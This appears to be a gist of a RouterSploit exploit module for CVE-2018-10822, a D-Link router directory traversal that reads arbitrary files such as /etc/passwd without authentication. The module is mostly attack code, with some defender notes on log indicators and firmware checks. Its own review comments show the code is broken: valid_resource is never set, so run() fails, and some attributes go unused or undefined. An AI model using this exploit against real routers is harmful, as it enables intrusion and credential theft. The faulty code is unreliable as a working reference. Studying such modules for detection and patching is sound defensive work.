Created
October 18, 2018 20:53
D-Link router Directory Traversal
import random | |
from routersploit.core.exploit import * | |
from routersploit.core.http.http_client import HTTPClient | |
class Exploit(HTTPClient):
    """RouterSploit module describing the D-Link httpd file read (CVE-2018-10822).

    The module issues unauthenticated HTTP GET requests to the router's web
    server and prints whatever body comes back for the requested file.

    Review notes for defenders and maintainers:

    * The request path used here sits under ``/uir``. GET requests to that
      prefix on the router's HTTP service, followed by an absolute filesystem
      path, are the observable to look for in proxy or web-server logs.
    * ``__info__["devices"]`` lists the models and firmware ceilings the
      author considers affected. Compare deployed firmware against that list
      and keep the management interface reachable only from trusted networks.
    * ``check()`` treats any HTTP 200 for ``/uir`` as "vulnerable". That is an
      indicator, not proof of file disclosure, so a positive result should be
      confirmed against the device's firmware version.
    """

    __info__ = {
        "name": "D-Link router Directory Traversal",
        "description": (
            "This module exploits a vulnerability in D-Link router httpd server. "
            "An unauthenticated attacker may read arbitrary files from the system."
        ),
        "authors": (
            "@jnazario",  # routersploit module
            "Blazej Adamczyk",  # discovery and PoC
        ),
        "references": (
            "http://sploit.tech/2018/10/12/D-Link.html",
            "CVE-2018-10822",
        ),
        "devices": (
            "DWR-116 through 1.06",
            "DIR-140L through 1.02",
            "DIR-640L through 1.02",
            "DWR-512 through 2.02",
            "DWR-712 through 2.02",
            "DWR-912 through 2.02",
            "DWR-921 through 2.02",
            "DWR-111 through 1.01",
        ),
    }

    # Operator-settable options: address, port and the file whose contents
    # the module asks the device for.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    filename = OptString("/etc/passwd", "File to read from the filesystem")

    def __init__(self):
        """Set up the path template tuple and the (initially unset) chosen path."""
        # NOTE(review): nothing in this class reads `resources` afterwards.
        self.resources = ("/uir//{}",)
        # Stays None unless some other code assigns it; this class never does.
        self.valid_resource = None

    def run(self):
        """Run the check, then request ``filename`` and print the response body."""
        if not self.check():
            print_error("Exploit failed - target seems to be not vulnerable")
            return

        print_success("Target appears to be vulnerable")

        # NOTE(review): `valid_resource` is still None at this point in the
        # code shown here, so this `.format` call raises AttributeError.
        request_path = self.valid_resource.format(self.filename)
        reply = self.http_request(method="GET", path=request_path)

        if reply is None:
            print_error("Error with reading response")
            return

        if not reply.text:
            print_error("Exploit failed - empty response")
            return

        print_status("Reading file: {}".format(self.filename))
        print_info(reply.text)

    @mute
    def check(self):
        """Return True when a GET for ``<basepath>/uir`` answers with HTTP 200.

        Any other status, or no response at all, yields False. A 200 here only
        shows that the path is served; it does not confirm file disclosure.
        """
        # NOTE(review): `basepath` is not defined in this class; presumably it
        # is inherited from HTTPClient - confirm before relying on this probe.
        probe = self.http_request(
            method="GET",
            path=self.basepath.rstrip("/") + "/uir",
        )
        return probe is not None and probe.status_code == 200